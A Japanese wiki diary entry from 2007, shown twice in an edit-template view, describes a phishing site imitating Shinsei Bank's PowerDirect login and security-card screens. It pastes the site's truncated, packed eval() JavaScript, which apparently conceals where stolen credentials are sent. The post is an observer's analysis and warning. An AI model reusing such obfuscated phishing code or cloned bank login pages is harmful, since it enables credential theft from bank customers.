diary/Kojima/2007-07-25
をテンプレートにして作成
[
トップ
] [
新規
|
一覧
|
検索
|
最終更新
|
ヘルプ
|
ログイン
]
開始行:
[[diary/Kojima]]
・新生銀行のフィッシングサイト
しばらく前にも新生銀行のフィッシングサイトが現われた,っ...
今日,また新しいフィッシングサイトへ誘導するメールがバラ...
私自身も新生銀行にはアカウントを持っているので,NNIPFでも...
ルは通すようになっているのだけど,今朝がた,SPAM に判別さ...
めてみたら From 行は"no_reply@shinseibank.com" なアドレ...
レスは全然別のところからのメールが SPAM と判定されていた...
身を見てみると,見た目の URL は新生銀行のPowerDirectだけ...
ているのは全然別(kfcweb.com とか)のアドレスになっている誘...
夕方に,新生銀行から注意を促すメールが届いたのだけど,Gm...
と迷惑メールに分別されていた.
面白いかな,と思って,実際にそのメールが参照しているサイ...
ら,新生銀行のログイン画面をきれいにマネして作っていた.
#ref(shinsei1.jpg)
しかも,最近のPowerDirectだと,各ユーザごとに送付されたセ...
ドに記されたランダムなセキュリティ番号を入力しないといけ...
画面もちゃんと作ってあった.
#ref(shinsei2.jpg)
厳密に言うと,正式なセキュリティカードの場合はカードに記...
な記号のうち,指定された 3 個所の記号を入力することにな...
この画面みたいに横一列全部とかセキュリティカード番号を入...
目は存在しない.
LiveConnect.php なるソースコードをざっと見た感じ,入力し...
る先のサイトは直接記載されていないので,どうやら以下の ja...
に埋め込まれているみたい.
# javascript は詳しくないので,デコードはできなかったけど...
<script type="text/javascript">eval(function(p,a,c,k,e,d...
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=...
k=[function(e){return d[e]}];e=function(){return'\\w+'};...
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\...
('m(l(\'%b%k%e%1%j%9%n%g%t%s%o%r%g%9%q%i%2%1%0%0%5%e%2...
%1%0%0%4%6%2%1%0%0%3%c%2%1%0%0%3%b%2%1%0%0%3%a%2%1%0%0%6...
%6%2%1%0%0%3%5%2%1%0%0%5%b%2%1%0%0%3%d%2%1%0%0%4%7%2%1%0...
%0%5%h%2%1%0%0%6%f%2%1%0%0%6%f%2%1%0%0%5%0%2%1%0%0%4%d%2...
%1%0%0%3%7%2%1%0%0%3%3%2%1%0%0%5%8%2%1%0%0%3%3%2%1%0%0%5...
%f%2%1%0%0%3%c%2%1%0%0%3%7%2%1%0%0%4%5%2%1%0%0%3%a%2%1%0...
%0%3%a%2%1%0%0%6%9%2%1%0%0%4%0%2%1%0%0%3%d%2%1%0%0%4%0%2...
%1%0%0%3%8%2%1%0%0%3%7%2%1%0%0%4%7%2%1%0%0%3%d%2%1%0%0%5...
%0%2%1%0%0%3%d%2%1%0%0%3%a%2%1%0%0%3%8%2%1%0%0%3%4%2%1%0...
%0%5%b%2%1%0%0%5%c%2%1%0%0%6%0%2%1%0%0%4%5%2%1%0%0%4%7%2...
%1%0%0%3%a%2%1%0%0%5%b%2%1%0%0%6%6%2%1%0%0%3%7%2%1%0%0%3...
%0%2%1%0%0%3%e%2%1%0%0%3%c%2%1%0%0%4%8%2%1%0%0%5%h%2%1%0...
%0%3%9%2%1%0%0%3%a%2%1%0%0%6%6%2%1%0%0%5%9%2%1%0%0%5%e%2...
%1%0%0%3%3%2%1%0%0%4%6%2%1%0%0%3%c%2%1%0%0%3%b%2%1%0%0%3...
',30,30,'30|75|5C|36|37|33|32|34|39|65|35|64|31|38|63|66...
eval|6E|72|29|28|69|77|2E'.split('|'),0,{}))</script>
フォーマットの都合で適宜改行を入れているのでご注意
まぁ,このフィッシングサイトでもメニューバーの URL 欄には
kfcweb.com/shinseibank.com.jp/login.html とか表示されてい...
その時点で怪しいサイトだと気づく(手元では,それ以前に誘導...
SPAM と判断されてたり)けど,ログイン画面とかはかなり正確...
いるので,その努力にはちょっと感心したり(苦笑
#comment
終了行:
[[diary/Kojima]]
・新生銀行のフィッシングサイト
しばらく前にも新生銀行のフィッシングサイトが現われた,っ...
今日,また新しいフィッシングサイトへ誘導するメールがバラ...
私自身も新生銀行にはアカウントを持っているので,NNIPFでも...
ルは通すようになっているのだけど,今朝がた,SPAM に判別さ...
めてみたら From 行は"no_reply@shinseibank.com" なアドレ...
レスは全然別のところからのメールが SPAM と判定されていた...
身を見てみると,見た目の URL は新生銀行のPowerDirectだけ...
ているのは全然別(kfcweb.com とか)のアドレスになっている誘...
夕方に,新生銀行から注意を促すメールが届いたのだけど,Gm...
と迷惑メールに分別されていた.
面白いかな,と思って,実際にそのメールが参照しているサイ...
ら,新生銀行のログイン画面をきれいにマネして作っていた.
#ref(shinsei1.jpg)
しかも,最近のPowerDirectだと,各ユーザごとに送付されたセ...
ドに記されたランダムなセキュリティ番号を入力しないといけ...
画面もちゃんと作ってあった.
#ref(shinsei2.jpg)
厳密に言うと,正式なセキュリティカードの場合はカードに記...
な記号のうち,指定された 3 個所の記号を入力することにな...
この画面みたいに横一列全部とかセキュリティカード番号を入...
目は存在しない.
LiveConnect.php なるソースコードをざっと見た感じ,入力し...
る先のサイトは直接記載されていないので,どうやら以下の ja...
に埋め込まれているみたい.
# javascript は詳しくないので,デコードはできなかったけど...
<script type="text/javascript">eval(function(p,a,c,k,e,d...
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=...
k=[function(e){return d[e]}];e=function(){return'\\w+'};...
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\...
('m(l(\'%b%k%e%1%j%9%n%g%t%s%o%r%g%9%q%i%2%1%0%0%5%e%2...
%1%0%0%4%6%2%1%0%0%3%c%2%1%0%0%3%b%2%1%0%0%3%a%2%1%0%0%6...
%6%2%1%0%0%3%5%2%1%0%0%5%b%2%1%0%0%3%d%2%1%0%0%4%7%2%1%0...
%0%5%h%2%1%0%0%6%f%2%1%0%0%6%f%2%1%0%0%5%0%2%1%0%0%4%d%2...
%1%0%0%3%7%2%1%0%0%3%3%2%1%0%0%5%8%2%1%0%0%3%3%2%1%0%0%5...
%f%2%1%0%0%3%c%2%1%0%0%3%7%2%1%0%0%4%5%2%1%0%0%3%a%2%1%0...
%0%3%a%2%1%0%0%6%9%2%1%0%0%4%0%2%1%0%0%3%d%2%1%0%0%4%0%2...
%1%0%0%3%8%2%1%0%0%3%7%2%1%0%0%4%7%2%1%0%0%3%d%2%1%0%0%5...
%0%2%1%0%0%3%d%2%1%0%0%3%a%2%1%0%0%3%8%2%1%0%0%3%4%2%1%0...
%0%5%b%2%1%0%0%5%c%2%1%0%0%6%0%2%1%0%0%4%5%2%1%0%0%4%7%2...
%1%0%0%3%a%2%1%0%0%5%b%2%1%0%0%6%6%2%1%0%0%3%7%2%1%0%0%3...
%0%2%1%0%0%3%e%2%1%0%0%3%c%2%1%0%0%4%8%2%1%0%0%5%h%2%1%0...
%0%3%9%2%1%0%0%3%a%2%1%0%0%6%6%2%1%0%0%5%9%2%1%0%0%5%e%2...
%1%0%0%3%3%2%1%0%0%4%6%2%1%0%0%3%c%2%1%0%0%3%b%2%1%0%0%3...
',30,30,'30|75|5C|36|37|33|32|34|39|65|35|64|31|38|63|66...
eval|6E|72|29|28|69|77|2E'.split('|'),0,{}))</script>
フォーマットの都合で適宜改行を入れているのでご注意
まぁ,このフィッシングサイトでもメニューバーの URL 欄には
kfcweb.com/shinseibank.com.jp/login.html とか表示されてい...
その時点で怪しいサイトだと気づく(手元では,それ以前に誘導...
SPAM と判断されてたり)けど,ログイン画面とかはかなり正確...
いるので,その努力にはちょっと感心したり(苦笑
#comment
ページ名: